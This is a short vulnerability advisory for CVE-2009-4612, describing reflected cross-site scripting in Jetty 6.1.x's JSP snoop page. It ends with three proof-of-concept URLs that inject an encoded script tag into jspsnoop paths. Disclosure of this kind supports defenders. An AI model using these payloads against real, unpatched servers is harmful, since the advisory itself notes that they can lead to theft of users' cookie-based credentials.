Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities

Related Vulnerabilities: CVE-2009-4612  
Publish Date: 24 Oct 2009
Author: aScii
                							

                source: http://www.securityfocus.com/bid/37927/info

Jetty is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/jspsnoop/ERROR/%3Cscript%3Ealert(123)%3C/script%3E
http://www.example.com/jspsnoop/IOException/%3Cscript%3Ealert(123)%3C/script%3E
http://www.example.com/jspsnoop/%3Cscript%3Ealert(123)%3C/script%3E